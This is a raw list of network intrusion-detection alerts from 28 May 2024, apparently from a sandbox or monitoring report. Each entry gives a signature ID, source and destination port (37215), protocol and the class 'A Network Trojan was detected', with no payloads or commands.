            Timestamp:05/28/24-09:56:11.941599
            SID:2829579
            Source Port:43318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.946808
            SID:2835222
            Source Port:57636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847640
            SID:2829579
            Source Port:39262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968457
            SID:2829579
            Source Port:46054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.745881
            SID:2835222
            Source Port:57206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.738302
            SID:2835222
            Source Port:33914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.381961
            SID:2835222
            Source Port:46384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310830
            SID:2829579
            Source Port:41840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.819821
            SID:2829579
            Source Port:37760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.948886
            SID:2835222
            Source Port:52130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.071858
            SID:2829579
            Source Port:47138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862952
            SID:2829579
            Source Port:38784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.377035
            SID:2829579
            Source Port:45202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371463
            SID:2829579
            Source Port:55772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764695
            SID:2835222
            Source Port:44272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.904441
            SID:2835222
            Source Port:33134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856726
            SID:2835222
            Source Port:35996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047814
            SID:2835222
            Source Port:43060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.532894
            SID:2835222
            Source Port:55376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.107986
            SID:2835222
            Source Port:44814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.776319
            SID:2835222
            Source Port:33592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887769
            SID:2835222
            Source Port:45154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.899182
            SID:2829579
            Source Port:51086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433503
            SID:2829579
            Source Port:38386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777630
            SID:2835222
            Source Port:42330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995312
            SID:2829579
            Source Port:52578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854862
            SID:2835222
            Source Port:48752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533807
            SID:2829579
            Source Port:51520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.414247
            SID:2835222
            Source Port:42838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.766197
            SID:2835222
            Source Port:52908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038378
            SID:2835222
            Source Port:38718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437348
            SID:2835222
            Source Port:55376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412890
            SID:2835222
            Source Port:48818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887435
            SID:2835222
            Source Port:34248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303824
            SID:2829579
            Source Port:55620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371273
            SID:2835222
            Source Port:59966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.027681
            SID:2835222
            Source Port:41882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707746
            SID:2829579
            Source Port:46772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735578
            SID:2835222
            Source Port:35426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.928970
            SID:2835222
            Source Port:56438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.506839
            SID:2835222
            Source Port:50744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559221
            SID:2835222
            Source Port:40220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.924929
            SID:2835222
            Source Port:56684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.938954
            SID:2829579
            Source Port:44590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.725817
            SID:2835222
            Source Port:40366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510386
            SID:2829579
            Source Port:55408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.716173
            SID:2835222
            Source Port:46576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.425880
            SID:2829579
            Source Port:54548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956422
            SID:2829579
            Source Port:50772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525729
            SID:2829579
            Source Port:35470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280453
            SID:2835222
            Source Port:43086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.643838
            SID:2829579
            Source Port:53630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470636
            SID:2829579
            Source Port:45360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.905192
            SID:2829579
            Source Port:49264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.904474
            SID:2835222
            Source Port:41550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.908450
            SID:2829579
            Source Port:38072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.818291
            SID:2835222
            Source Port:52834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856217
            SID:2829579
            Source Port:48826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343533
            SID:2835222
            Source Port:38064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.681268
            SID:2835222
            Source Port:42014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.764855
            SID:2835222
            Source Port:48752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737851
            SID:2835222
            Source Port:37430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.745952
            SID:2835222
            Source Port:49056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842844
            SID:2829579
            Source Port:59470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.331004
            SID:2829579
            Source Port:46494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860679
            SID:2829579
            Source Port:60202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033367
            SID:2829579
            Source Port:45704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.944246
            SID:2835222
            Source Port:33736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055994
            SID:2835222
            Source Port:39010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989870
            SID:2829579
            Source Port:46914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.572182
            SID:2835222
            Source Port:52642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837496
            SID:2829579
            Source Port:53692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000770
            SID:2829579
            Source Port:35646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280752
            SID:2835222
            Source Port:48452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445070
            SID:2835222
            Source Port:41470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.680240
            SID:2835222
            Source Port:35454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.565875
            SID:2829579
            Source Port:39036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730329
            SID:2835222
            Source Port:37910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855394
            SID:2835222
            Source Port:56560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995547
            SID:2835222
            Source Port:34586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.540086
            SID:2829579
            Source Port:54008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936847
            SID:2835222
            Source Port:60930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994749
            SID:2829579
            Source Port:60926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.670825
            SID:2835222
            Source Port:44296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.606282
            SID:2835222
            Source Port:41362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.732679
            SID:2835222
            Source Port:35774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776946
            SID:2835222
            Source Port:57982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.317890
            SID:2835222
            Source Port:48526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986240
            SID:2829579
            Source Port:48740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.291953
            SID:2835222
            Source Port:48260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984458
            SID:2835222
            Source Port:60302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.831639
            SID:2829579
            Source Port:41458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.298619
            SID:2829579
            Source Port:60966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.876188
            SID:2829579
            Source Port:34356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.480356
            SID:2835222
            Source Port:44850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.734284
            SID:2835222
            Source Port:36618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.636213
            SID:2829579
            Source Port:39890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765203
            SID:2835222
            Source Port:54570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065593
            SID:2829579
            Source Port:35628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919445
            SID:2829579
            Source Port:33208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.335898
            SID:2829579
            Source Port:40228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862126
            SID:2829579
            Source Port:53266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917557
            SID:2829579
            Source Port:40142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.024519
            SID:2829579
            Source Port:48804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.862306
            SID:2835222
            Source Port:52640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.859367
            SID:2829579
            Source Port:56762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.846377
            SID:2835222
            Source Port:43502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.764071
            SID:2829579
            Source Port:40714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.534122
            SID:2829579
            Source Port:55450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611491
            SID:2829579
            Source Port:35410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.074300
            SID:2835222
            Source Port:54918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.413021
            SID:2835222
            Source Port:43716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.784099
            SID:2829579
            Source Port:59418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765782
            SID:2835222
            Source Port:43074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.375494
            SID:2829579
            Source Port:59874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052764
            SID:2835222
            Source Port:42900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002959
            SID:2829579
            Source Port:56358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.824216
            SID:2829579
            Source Port:40230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.698209
            SID:2835222
            Source Port:41038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717389
            SID:2829579
            Source Port:57570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.477643
            SID:2835222
            Source Port:55122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.903405
            SID:2835222
            Source Port:51264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.070670
            SID:2829579
            Source Port:35802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048048
            SID:2829579
            Source Port:51138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893332
            SID:2829579
            Source Port:52710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969342
            SID:2835222
            Source Port:57284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.760919
            SID:2829579
            Source Port:43128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709505
            SID:2835222
            Source Port:49800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880166
            SID:2835222
            Source Port:40978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.029291
            SID:2835222
            Source Port:44588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.414268
            SID:2835222
            Source Port:46172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.875786
            SID:2829579
            Source Port:56790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.851119
            SID:2835222
            Source Port:57414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953689
            SID:2835222
            Source Port:48364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931976
            SID:2829579
            Source Port:36116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755024
            SID:2829579
            Source Port:37428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.829845
            SID:2829579
            Source Port:51340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810221
            SID:2835222
            Source Port:34240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.863117
            SID:2829579
            Source Port:60306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532968
            SID:2835222
            Source Port:42870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.578263
            SID:2829579
            Source Port:50568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000110
            SID:2835222
            Source Port:39426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.059869
            SID:2835222
            Source Port:52728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543920
            SID:2829579
            Source Port:45750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943787
            SID:2835222
            Source Port:37348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.102805
            SID:2829579
            Source Port:57356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.102829
            SID:2829579
            Source Port:33552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737361
            SID:2829579
            Source Port:39886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735629
            SID:2835222
            Source Port:57206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280384
            SID:2835222
            Source Port:52272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.059751
            SID:2829579
            Source Port:48546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.701933
            SID:2835222
            Source Port:32918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.486839
            SID:2835222
            Source Port:35458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.676630
            SID:2835222
            Source Port:53470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.811108
            SID:2835222
            Source Port:60766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861177
            SID:2829579
            Source Port:55530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868475
            SID:2835222
            Source Port:35790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.383373
            SID:2829579
            Source Port:39308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.519802
            SID:2829579
            Source Port:48994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808187
            SID:2829579
            Source Port:34772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321516
            SID:2829579
            Source Port:56968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.944080
            SID:2829579
            Source Port:45198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841112
            SID:2829579
            Source Port:56994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.962983
            SID:2835222
            Source Port:47956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810719
            SID:2835222
            Source Port:45610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.999806
            SID:2835222
            Source Port:35990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.528011
            SID:2829579
            Source Port:51224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444982
            SID:2835222
            Source Port:40120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807447
            SID:2835222
            Source Port:49986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510076
            SID:2829579
            Source Port:44634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.977150
            SID:2829579
            Source Port:53116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899542
            SID:2829579
            Source Port:45280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.994366
            SID:2829579
            Source Port:44770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952641
            SID:2829579
            Source Port:55094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086380
            SID:2829579
            Source Port:40650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.782877
            SID:2835222
            Source Port:45904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818573
            SID:2835222
            Source Port:40672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953294
            SID:2835222
            Source Port:54146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918199
            SID:2829579
            Source Port:52604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310600
            SID:2835222
            Source Port:51146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435425
            SID:2835222
            Source Port:59866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442956
            SID:2829579
            Source Port:56894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.692919
            SID:2835222
            Source Port:48796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854160
            SID:2835222
            Source Port:34008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.733222
            SID:2835222
            Source Port:40778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.187373
            SID:2835222
            Source Port:50284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.299835
            SID:2829579
            Source Port:46372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741034
            SID:2835222
            Source Port:52250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.431934
            SID:2829579
            Source Port:37714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999183
            SID:2835222
            Source Port:60524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065224
            SID:2829579
            Source Port:57176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793735
            SID:2835222
            Source Port:53398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704307
            SID:2829579
            Source Port:50740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869102
            SID:2835222
            Source Port:35710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.335391
            SID:2829579
            Source Port:47504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.932849
            SID:2835222
            Source Port:42562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.675622
            SID:2835222
            Source Port:46342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879468
